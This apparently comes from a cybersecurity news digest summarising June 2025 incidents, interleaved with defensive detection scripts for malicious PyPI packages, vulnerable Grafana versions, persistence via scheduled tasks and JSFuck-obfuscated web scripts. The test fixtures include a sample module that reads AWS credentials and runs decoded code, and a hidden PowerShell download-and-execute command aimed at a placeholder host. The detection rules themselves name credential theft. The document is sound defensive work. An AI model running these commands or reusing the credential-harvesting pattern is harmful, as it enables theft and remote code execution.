Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11822
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Link |
|---|---|---|---|---|---|
| 2025-06-16 08:02:05 | theregister | MISCELLANEOUS | Collaborative Security Boosts Profitability, Human-Centric Study Reveals | OutThink's 2025 human risk report opens with the widely quoted figure that 95% of data breaches involve human error, and argues that managing human risk should be treated as a core security discipline.
Organisations whose employees actively collaborate with the security team report 32% higher profitability than those that do not.
The report recommends replacing periodic security-awareness training with continuous, adaptive human risk management, on the grounds that it improves both data protection and business performance.
In organisations with highly engaged security cultures, non-compliance among privileged users falls from 27% to 6%.
Security champions are more common in collaborative environments and are associated with stronger security cultures and better team performance.
Line managers' cyber engagement correlates strongly (0.78) with the overall performance of their teams.
Recommendations: move beyond one-off training to continuous engagement, and make line managers the main drivers of security culture. | Details |
| 2025-06-16 06:47:10 | thehackernews | MALWARE | Malicious PyPI Package Targets AWS and macOS Developer Data | Researchers have identified a malicious package on the Python Package Index (PyPI) built to steal sensitive data from developers.
The package, chimera-sandbox-extensions, was downloaded 143 times and posed as an add-on for Chimera Sandbox, a tool developed by Grab.
It harvests AWS tokens, CI/CD environment variables and macOS configuration data through a multi-stage infection chain.
The stealer sends what it collects to an attacker-controlled server, which then decides whether the infected host is worth exploiting further.
The campaign shows how far supply-chain malware has matured; development teams should verify what they install rather than trust a package name.
Separately, several malicious npm packages were removed from the registry after accumulating downloads, showing the same pattern in the JavaScript ecosystem.
Both cases underline the continuing exposure of open-source package registries and the need for stronger dependency controls among developers and their employers. | Details |
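The item above describes what the package went after (cloud credentials, CI/CD environment variables, macOS configuration, a hidden second stage fetched from a server). What a practitioner wants at that point is a quick way to triage an untrusted package before it is installed. The script below is an added example, not code from the JFrog report, from Grab, or from this page: it scans Python source for those behaviours and turns hits into a score for human review. The rule patterns, weights and thresholds are my own heuristics, and the two sample modules are constructed, not the real package.

```python
"""Static triage of an untrusted Python package before installation.

Added example, not code from the chimera-sandbox-extensions report or from
Grab. It scans Python source for the behaviours the brief describes (reading
AWS credentials, harvesting CI/CD environment variables wholesale, reading
macOS/Jamf configuration, decode-then-exec of hidden payloads, network calls
and setup-time install hooks) and turns the hits into a score for a human to
review. Patterns and weights are my own heuristics, not a published rule set.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import Path

# (rule name, pattern, weight). A match is a reason to look, not proof of malice.
RULES: list[tuple[str, re.Pattern[str], int]] = [
    ("aws-credentials", re.compile(r"AWS_(?:ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)|\.aws/credentials"), 5),
    ("ci-environment", re.compile(r"\b(?:GITHUB_TOKEN|CI_JOB_TOKEN|GITLAB_\w+|JENKINS_\w+|CIRCLE_\w+)\b"), 4),
    ("env-harvest", re.compile(r"dict\(os\.environ\)|os\.environ\.(?:items|copy)\(\)"), 3),
    ("macos-config", re.compile(r"Application Support/JAMF|/var/db/ConfigurationProfiles|\.zscaler"), 3),
    ("kube-token", re.compile(r"/var/run/secrets/kubernetes\.io"), 3),
    ("hidden-exec", re.compile(r"\b(?:exec|eval)\s*\(\s*(?:base64\.b64decode|zlib\.decompress|marshal\.loads)"), 6),
    ("network", re.compile(r"\b(?:urllib\.request|requests\.(?:get|post)|http\.client|socket\.socket)\b"), 2),
    ("install-hook", re.compile(r"cmdclass\s*=|class\s+\w+\((?:install|develop|build_py)\)"), 4),
]


@dataclass
class Finding:
    path: str
    line: int
    rule: str
    weight: int
    text: str


def triage_source(path: str, source: str) -> tuple[int, list[Finding]]:
    """Score one file's source text; returns (score, findings)."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for rule, pattern, weight in RULES:
            if pattern.search(line):
                findings.append(Finding(path, lineno, rule, weight, line.strip()[:120]))
    return sum(f.weight for f in findings), findings


def triage_package(root: Path) -> tuple[int, list[Finding]]:
    """Score every .py file under an unpacked sdist/wheel directory."""
    score, findings = 0, []
    for file in sorted(root.rglob("*.py")):
        s, f = triage_source(str(file.relative_to(root)), file.read_text(errors="replace"))
        score += s
        findings.extend(f)
    return score, findings


def verdict(score: int) -> str:
    return "block" if score >= 10 else "review" if score >= 4 else "ok"


# Constructed samples, not the real package: a stealer-like module and an ordinary one.
SAMPLE_MALICIOUS = '''
import base64, os, urllib.request
def _collect():
    data = dict(os.environ)                      # grabs every CI/CD variable
    data["aws"] = open(os.path.expanduser("~/.aws/credentials")).read()
    return data
exec(base64.b64decode("cHJpbnQoJ3N0YWdlIDInKQ=="))   # decode-then-exec of a hidden stage
'''

SAMPLE_BENIGN = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for name, src in (("sample_malicious.py", SAMPLE_MALICIOUS), ("sample_benign.py", SAMPLE_BENIGN)):
        score, findings = triage_source(name, src)
        print(f"{name}: score={score} verdict={verdict(score)}")
        for f in findings:
            print(f"  {f.path}:{f.line} [{f.rule} +{f.weight}] {f.text}")
```

Run it against an unpacked `pip download --no-deps --no-binary :all: <package>` tree with `triage_package(Path("pkg-1.0"))`; the scoring deliberately favours the combination that matters (credential reads plus network plus hidden execution) over any single hit, since plenty of legitimate packages make HTTP calls.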
| 2025-06-16 02:54:29 | theregister | CYBERCRIME | Australia Unveils Major Crypto Money-Laundering Operation Involving Security Firm | The Australian Federal Police have charged four people over an AU$190 million money-laundering scheme.
The scheme mixed illicit cash with legitimate business takings by passing it through a security company's armoured cash-transport service.
The laundered funds were then moved through a sales promotion company, a classic car dealership and cryptocurrency exchanges.
The cleaned money was returned to clients as cryptocurrency or through third-party businesses.
Those charged include the security company's director and general manager, a major client, and the person who handled the transfers of the illicit funds.
The case shows how cash-handling businesses can serve as an on-ramp into cryptocurrency, and how hard such flows are to detect.
It also highlights the continuing regulatory concern over the use of cryptocurrency in laundering. | Details |
| 2025-06-15 22:03:38 | theregister | MISCELLANEOUS | Congressional Review Requested for CVE Program amid Funding Uncertainties | House Democrats Bennie Thompson and Zoe Lofgren have asked the GAO to audit the Common Vulnerabilities and Exposures (CVE) program over concerns about its continuity and funding.
The Cybersecurity and Infrastructure Security Agency (CISA) extended MITRE's contract to run the CVE program by eleven months shortly before it was due to lapse in April.
The request asks the GAO to assess how effectively the federal programs behind CVE and the National Vulnerability Database (NVD), on which vulnerability management worldwide depends, are being run.
The Trump administration has proposed cuts to CISA's budget, which have alarmed Democrats and coincided with the departure of senior staff.
The same roundup notes a critical Roundcube webmail flaw (CVE-2025-49113, post-authentication remote code execution through PHP object deserialization) that is being exploited in the wild.
Other items include abuse of expired Discord invite links, a late-reported data breach at McLean Mortgage, and use of the TeamFiltration penetration-testing framework against Microsoft Entra ID (Office 365) accounts.
Palo Alto Networks' Unit 42 also reported a large injection campaign it calls JSFireTruck, named after the JSFuck obfuscation style it uses, which planted malicious JavaScript on many thousands of websites. | Details |
| 2025-06-15 14:14:12 | bleepingcomputer | CYBERCRIME | Over 46,000 Grafana Instances at Risk from Account Takeover Bug | More than 46,000 internet-facing Grafana instances are still running versions vulnerable to CVE-2025-4123, weeks after fixed releases were published.
The bug chains a client-side path traversal with an open redirect so that a crafted link loads an attacker-hosted frontend plugin inside the victim's Grafana session, allowing account takeover.
The flaw was reported by bug bounty hunter Alvaro Balada; Grafana Labs shipped fixes on May 21, yet roughly 36% of exposed instances remain unpatched.
OX Security showed that the loaded plugin can run arbitrary JavaScript and hijack the session without the attacker holding any privileges on the instance.
The attacker only needs the victim to open a malicious URL; the plugin can then alter the user's credentials and permission settings.
Grafana's default Content Security Policy limits the attack but does not fully block it.
Administrators should upgrade to the fixed releases named in Grafana's advisory and review which instances are reachable from the internet. | Details |
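The brief says a third of exposed instances are unpatched but not how to tell which ones. Grafana reports its version without authentication at `/api/health`, so the check reduces to comparing that string against the first fixed release on each line. The script below is an added example, not Grafana Labs code and not from this page. The FIXED table is the list of patched releases as I recall it from the vendor advisory for CVE-2025-4123; treat it as an assumption and confirm it against the advisory before acting on the output. The `/api/health` body in the block is constructed.

```python
"""Flag Grafana versions still exposed to CVE-2025-4123 from the /api/health response.

Added example, not Grafana Labs code. FIXED lists the first patched release on
each supported line as I recall it from the vendor advisory; verify it against
the advisory before relying on this. Lines with no entry are treated as
vulnerable (conservative), and lines newer than the newest fixed line are
treated as fixed because they were cut after the fix.
"""
import json
import re

# (major, minor) -> first fixed release on that line. Assumption: verify against the advisory.
FIXED = {
    (12, 0): (12, 0, 0, "security-01"),
    (11, 6): (11, 6, 1, "security-01"),
    (11, 5): (11, 5, 4, "security-01"),
    (11, 4): (11, 4, 4, "security-01"),
    (11, 3): (11, 3, 6, "security-01"),
    (11, 2): (11, 2, 9, "security-01"),
    (10, 4): (10, 4, 18, "security-01"),
}
NEWEST_FIXED_LINE = (12, 0)

# Grafana versions look like 11.2.9 or 11.2.9+security-01; a -pre suffix is ignored.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:\+([\w.\-]+))?")


def parse_version(text: str) -> tuple[int, int, int, str]:
    """'11.2.9+security-01' -> (11, 2, 9, 'security-01'); a missing build tag is ''."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version: {text!r}")
    major, minor, patch, build = m.groups()
    return int(major), int(minor), int(patch), build or ""


def is_vulnerable(version: str) -> bool:
    major, minor, patch, build = parse_version(version)
    line = (major, minor)
    if line > NEWEST_FIXED_LINE:
        return False                      # release line cut after the fix landed
    fixed = FIXED.get(line)
    if fixed is None:
        return True                       # no fix published for this line: treat as exposed
    _, _, fixed_patch, fixed_build = fixed
    if patch != fixed_patch:
        return patch < fixed_patch
    # Same x.y.z: the fix shipped as a '+security-01' build of the same number,
    # so a plain 11.2.9 is vulnerable and 11.2.9+security-01 is not.
    return build < fixed_build


def check_health(body: str) -> tuple[str, bool]:
    """Parse an /api/health JSON body and return (version, vulnerable)."""
    version = json.loads(body)["version"]
    return version, is_vulnerable(version)


if __name__ == "__main__":
    # Constructed /api/health body; fetch a real one with: curl -s https://grafana.example/api/health
    sample = '{"database": "ok", "version": "11.2.0", "commit": "0123abcd"}'
    v, vuln = check_health(sample)
    print(f"Grafana {v}: {'VULNERABLE, upgrade' if vuln else 'not affected'}")
```

Feed it the output of `curl -s https://<host>/api/health` for each instance in your inventory; the `+security-01` handling matters because a plain `12.0.0` or `11.6.1` looks current but predates the fix.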
| 2025-06-14 17:34:51 | bleepingcomputer | CYBERCRIME | Cyberattack Disrupts WestJet Airlines’ Internal Systems | WestJet, Canada's second-largest airline, has reported a cyberattack affecting its internal systems and mobile app.
Customers were temporarily unable to log in to the WestJet website and mobile app; both services have since been restored.
WestJet has brought in internal specialist teams, law enforcement and Transport Canada to investigate and contain the incident.
The airline says flight operations remain safe and that it is working to protect sensitive data, including personal information of guests and employees.
WestJet has not said whether the incident is ransomware or another form of attack, nor what caused the loss of access.
The airline apologised to guests for the disruption to its services.
An update on Saturday morning said operations remain secure, although some software and services are still affected. | Details |
| 2025-06-14 14:33:47 | bleepingcomputer | MALWARE | Anubis RaaS Enhances Operations with Destructive Wiper Feature | The Anubis ransomware-as-a-service (RaaS) has added a wiper module that destroys files beyond recovery, so paying the ransom no longer guarantees the data comes back.
Anubis, unrelated to the Android banking trojan of the same name, surfaced as a RaaS in December 2024 and has stepped up activity in recent months.
On February 23 its operators advertised an affiliate program on the RAMP forum, offering partners different revenue shares depending on their role.
Only eight victims are listed on the group's extortion site so far, but the new capabilities could drive up attack volume.
Trend Micro reports that recent Anubis samples carry a wiper function, apparently intended to pressure victims into paying faster by making recovery impossible.
The malware skips core system and program directories so the machine stays usable; it encrypts files with ECIES (Elliptic Curve Integrated Encryption Scheme) and appends the '.anubis' extension.
According to Trend Micro, Anubis reaches victims mainly through phishing emails carrying malicious links or attachments. | Details |
| 2025-06-14 02:51:12 | thehackernews | MALWARE | Discord Link Hijack Exploits Deliver RAT and Crypto Stealers | A new campaign hijacks expired Discord invite links to deliver Skuld Stealer and AsyncRAT, with cryptocurrency wallets as the main target.
Attackers re-register expired or deleted Discord invite codes on servers they control, exploiting a weakness in how Discord recycles invite codes, so old links now lead to malicious servers.
The campaign combines phishing, multi-stage loaders and evasion techniques, staging payloads on legitimate services such as GitHub and Pastebin to blend in.
The final payloads are a customised Skuld Stealer and AsyncRAT, giving the attackers stolen data and remote control of the host.
Victims are talked into infecting themselves: a fake "verification" step instructs them to run a PowerShell command, ClickFix-style.
The stealer collects browser data, Discord tokens and cryptocurrency wallet contents, going after seed phrases and passwords in particular.
A customised build of ChromeKatz is used to get around Chrome's app-bound encryption of cookies, and stolen data is exfiltrated through a Discord webhook.
Discord has disabled the bot used in the campaign, disrupting it; the same actors run similar campaigns against users worldwide. | Details |
| 2025-06-13 22:10:53 | theregister | NATION STATE ACTIVITY | Rising Cyber Threats Amid Israel-Iran Conflict, US on Alert | The Israel-Iran military conflict has become a hybrid war, with both sides using cyberattacks alongside conventional operations.
Iran is expected to step up cyber operations against Israel and may extend them to the United States in retaliation for the Israeli airstrikes.
Experts including former White House cyber advisor Michael Daniel note that both countries have mature capabilities, from DDoS to destructive wiper attacks, used for espionage as well as sabotage.
The concern for the US is its critical infrastructure and private sector: Iranian actors have already broken into US water systems by exploiting basic weaknesses such as internet-exposed controllers left on default passwords.
Groups such as CyberAv3ngers have, however, shown limited understanding of the industrial systems they reached, which blunted the real-world impact of those intrusions.
Practitioners warn that Iran may mobilise more of its own operators or encourage pro-regime hacktivists to intensify attacks on Israeli and US targets as it suffers military setbacks.
Small utilities and other under-resourced critical infrastructure operators leave the US particularly exposed.
Officials also caution against overstating the effect of such attacks, since Iran and allies such as Russia and China may exaggerate their claims for psychological effect. | Details |
| 2025-06-13 18:22:01 | theregister | NATION STATE ACTIVITY | China-Linked VPNs Still Available on Apple and Google Stores | A Tech Transparency Project report finds numerous VPN apps in Apple's and Google's app stores that are Chinese-owned without that ownership being disclosed to users.
Chinese law obliges domestic companies to assist the state's intelligence services on request, which is the core privacy concern for users of such VPNs.
Apple's App Store guidelines say VPN apps must not misuse user data, but the report questions how that is enforced for Chinese-owned apps.
Of the 20 popular free VPNs analysed, several are linked to Qihoo 360, a company placed on the US Entity List over alleged ties to China's People's Liberation Army.
Apps such as Turbo VPN and VPN Proxy Master nonetheless remain available in the US stores.
Google's policies contain no VPN-specific clauses and rely instead on general data-transparency requirements.
Neither Apple nor Google responded to questions about the security and ownership of these VPN developers. | Details |
| 2025-06-13 16:16:41 | bleepingcomputer | MALWARE | Hackers Reuse Expired Discord Invites for Malware Delivery | Attackers are abusing a weakness in Discord's invite system, re-registering expired or deleted invite codes so that old links redirect users to malware-serving servers.
The weakness is that invite codes can be reclaimed: vanity codes become available again when a Level 3 boosted server loses that status, and expired temporary or deleted permanent invite codes can likewise be registered by another server.
The attackers set up Discord servers that look legitimate and push visitors through a fake "verification" flow that ends with them running malware.
The campaign has hit more than 1,300 users in the US, UK, France, the Netherlands and Germany.
From the attacker's site, infection proceeds in stages: PowerShell, obfuscated C++ loaders and VBScript files, ending in remote access trojans and information-stealing malware.
Persistence is achieved with a scheduled task that re-runs the malware every five minutes.
Users should be wary of old invite links and of any "verification" that asks them to run a command; server admins are advised to prefer permanent invite links. | Details |
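Both write-ups of this campaign (the Hacker News item above and this one) end with the same host-side artefact: a scheduled task that re-runs the malware every five minutes after a PowerShell "verification" command. That is the part a defender can hunt for. The script below is an added example, not code from Check Point, BleepingComputer or The Hacker News: it parses the task-definition XML that Windows records in Security event 4698 (task created) and that `schtasks /query /xml` exports, and scores short repetition intervals, script-host commands, hidden/bypass/download arguments and binaries in user-writable paths. The two task definitions are constructed, not captured from the campaign, and the weights and threshold are mine.

```python
"""Flag scheduled tasks resembling five-minute PowerShell re-run persistence.

Added example, not code from the Discord invite-hijack reports. Input is the
task XML from Security event 4698 or `schtasks /query /tn <name> /xml`.
Scoring: short repetition interval (+2), script host as command (+2),
hidden/bypass/download arguments (+4), command in a user-writable path (+3);
6 or more is flagged. Weights and thresholds are my own.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = re.compile(r"(?:^|\\)(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(?:\.exe)?$", re.I)
SUSPICIOUS_ARGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|-e(?:p|xecutionpolicy)\s+bypass"
    r"|\biex\b|invoke-expression|downloadstring|\birm\b|invoke-restmethod|frombase64string",
    re.I,
)
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|programdata|users\\public|downloads)\\", re.I)


def parse_interval(iso: str) -> int:
    """ISO 8601 duration as used in task XML, e.g. 'PT5M' -> 300 seconds; -1 if unparseable."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso.strip())
    if not m:
        return -1
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def analyse_task(task_xml: str) -> dict:
    # Exported task XML declares encoding="UTF-16"; pyexpat rejects that on str input,
    # so drop the declaration before parsing the (already decoded) text.
    task_xml = re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml)
    root = ET.fromstring(task_xml)
    score, reasons = 0, []

    intervals = [parse_interval(e.text or "") for e in root.findall(".//t:Repetition/t:Interval", NS)]
    short = [i for i in intervals if 0 < i <= 600]
    if short:
        score += 2
        reasons.append(f"repeats every {min(short)}s")

    for action in root.findall(".//t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=NS).strip()
        if SCRIPT_HOSTS.search(cmd):
            score += 2
            reasons.append(f"script host: {cmd}")
        if SUSPICIOUS_ARGS.search(args):
            score += 4
            reasons.append("hidden/bypass/download arguments")
        if USER_WRITABLE.search(cmd):
            score += 3
            reasons.append(f"user-writable path: {cmd}")

    return {"score": score, "suspicious": score >= 6, "reasons": reasons}


# Constructed task definitions (not captured from the campaign).
MALICIOUS_TASK = r'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Repetition><Interval>PT5M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -ep bypass -c "iex (irm https://example.invalid/stage2)"</Arguments>
    </Exec>
  </Actions>
</Task>'''

BENIGN_TASK = r'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files\Vendor\updater.exe"</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>'''

if __name__ == "__main__":
    for name, xml_text in (("malicious", MALICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, analyse_task(xml_text))
```

The URL in the constructed task uses the reserved `.invalid` domain so nothing resolves if someone pastes it. In a SIEM, the same scoring applies to the TaskContent field of event 4698; the five-minute interval alone is weak evidence (backup and monitoring agents do it too), which is why it scores low on its own and the script-host plus hidden-window combination carries the weight.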
| 2025-06-13 15:32:14 | theregister | NATION STATE ACTIVITY | Apple Addresses Zero-Click Exploit in Spyware Scandal | Apple has patched iOS and iPadOS against a zero-click exploit used to deliver Paragon's Graphite spyware to journalists.
Two journalists whom Apple notified in April were confirmed to be infected, prompting an investigation by The Citizen Lab.
The flaw, tracked as CVE-2025-43200, allowed the spyware to be delivered through a maliciously crafted photo or video shared via an iCloud Link, with no user interaction required.
The Citizen Lab attributed both infections to the same Graphite operator, indicating targeted surveillance of specific individuals and organisations.
WhatsApp separately notified around 90 journalists and activists that they had been targeted with the same spyware.
The Italian government ended its contracts with Paragon after reports linked the spyware to infections of journalists and human rights activists.
Security experts note that Graphite operates covertly and is hard to detect with conventional mobile security tooling.
Apple advises users to install the latest updates and, if they may be targeted, to enable Lockdown Mode. | Details |
| 2025-06-13 14:15:36 | thehackernews | MALWARE | Over 269,000 Websites Hit by JSFireTruck JavaScript Malware | Researchers have uncovered a campaign that infected more than 269,000 web pages with JSFireTruck, an obfuscated malicious JavaScript, in the space of a month.
JSFireTruck is written in the JSFuck style, an esoteric encoding that expresses any JavaScript using only the six characters [ ] ( ) ! +, which makes the code hard to read and hard to match with simple signatures.
The script inspects document.referrer and, if the visitor arrived from a major search engine, redirects them to malicious sites that serve further malware or scams; visitors who arrive directly see no redirect.
Infections spiked on April 12, when around 50,000 pages were compromised in a single day, pointing to large-scale automated injection.
Separately, a traffic distribution service (TDS) named HelloTDS has been documented, routing users to deceptive sites based on geolocation, IP address and device fingerprinting.
HelloTDS uses a multi-stage, dynamic chain across many top-level domains to host content and manage redirects, evading detection and selecting its victims.
Together the two reports show how persistent and adaptive web-based malware delivery has become, and how much reach such campaigns have. | Details |
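This item and the earlier mention of the same Unit 42 report describe two properties that together tell you how to hunt for it: the payload is written in the six-character JSFuck alphabet, and it only fires when document.referrer names a search engine, so a scanner that fetches pages directly never sees the redirect and must recognise the obfuscation itself. The script below is an added example, not Unit 42's tooling and not from this page: it pulls inline scripts out of fetched HTML and flags those that are long and consist almost entirely of the JSFuck alphabet. The sample page is constructed (a valid JSFuck fragment repeated to realistic length), and the length and density thresholds are my own.

```python
"""Find JSFuck-style obfuscated inline scripts in fetched HTML.

Added example, not code from Unit 42. JSFuck expresses arbitrary JavaScript
using only the six characters [ ] ( ) ! +, so an inline script that is long
and made almost entirely of those characters is a strong signal. Because the
JSFireTruck payload only redirects when document.referrer names a search
engine, a direct fetch never triggers it; the scanner therefore looks at the
script body rather than at behaviour. Thresholds are mine; tune them.
"""
import re

JSFUCK_CHARS = frozenset("[]()!+")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def jsfuck_ratio(code: str) -> float:
    """Share of non-whitespace characters drawn from the JSFuck alphabet (0.0 for empty input)."""
    body = "".join(code.split())
    if not body:
        return 0.0
    return sum(c in JSFUCK_CHARS for c in body) / len(body)


def looks_like_jsfuck(code: str, min_len: int = 200, threshold: float = 0.95) -> bool:
    """Long enough to rule out a stray expression, and dense enough to rule out normal code."""
    body = "".join(code.split())
    return len(body) >= min_len and jsfuck_ratio(code) >= threshold


def find_jsfuck_scripts(html: str) -> list[dict]:
    """Return one record per inline <script> whose body looks JSFuck-encoded."""
    hits = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        code = match.group(1)
        if looks_like_jsfuck(code):
            hits.append({"script_index": index,
                         "length": len("".join(code.split())),
                         "ratio": round(jsfuck_ratio(code), 3)})
    return hits


# Constructed sample: (![]+[])[+[]] is valid JSFuck (it evaluates to "f"); repeating it
# gives a realistic-length blob inside an otherwise ordinary page.
JSFUCK_SAMPLE = "+".join(["(![]+[])[+[]]"] * 30)
SAMPLE_PAGE = f"""<html><head>
<script src="/static/app.js"></script>
<script>
  // ordinary inline code: some brackets, mostly identifiers and strings
  document.addEventListener("DOMContentLoaded", function () {{ console.log("ready"); }});
</script>
<script>{JSFUCK_SAMPLE}</script>
</head><body>hello</body></html>"""

if __name__ == "__main__":
    for hit in find_jsfuck_scripts(SAMPLE_PAGE):
        print(f"inline script #{hit['script_index']}: {hit['length']} chars, JSFuck ratio {hit['ratio']}")
```

For a site crawl, feed each fetched body to `find_jsfuck_scripts`; external scripts (`src=`) have to be fetched and passed in as their own "page" since the regex only sees inline bodies. Legitimate minified code rarely exceeds a ratio of about 0.3, so the 0.95 threshold leaves room without admitting it.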
| 2025-06-13 13:43:21 | theregister | MISCELLANEOUS | Unreasonable Job Expectations Stifle Cybersecurity Recruitment | ISC2 finds that unrealistic requirements in job descriptions for junior cybersecurity roles are undermining hiring.
Entry-level adverts routinely demand advanced certifications and years of experience that newcomers cannot plausibly have.
More than a third of hiring managers expect early-career professionals to hold senior certifications such as CISSP, which itself requires years of experience.
The report stresses on-the-job training and development support as the way to close the skills gap.
Hiring managers in India weigh technical skills most heavily, while other regions value interpersonal skills alongside technical ability.
Hiring from non-STEM backgrounds can help, bringing new perspectives into security teams.
Employers are increasingly sourcing candidates through internships, apprenticeships and non-traditional educational routes.
The market is shifting towards specialists, with falling demand for generalists and a glut of candidates after recent layoffs. | Details |
| 2025-06-13 12:00:07 | bleepingcomputer | CYBERCRIME | Victoria's Secret Recovers from Cyberattack with Full System Restoration | Victoria's Secret says it has restored all critical systems after a May 24 cyberattack that disrupted corporate and e-commerce operations.
The retailer is back to full functionality and is working with external security experts to assess the incident's scope.
The company expects no material effect on its fiscal 2025 results, although it may continue to incur attack-related costs.
The attack forced Victoria's Secret to delay its Q1 earnings release while key systems were unavailable.
The incident is one of a string of recent attacks on major fashion and retail brands, which some observers read as a coordinated campaign, although no link has been confirmed.
No group has claimed responsibility, and the company has not disclosed the nature of the attack. | Details |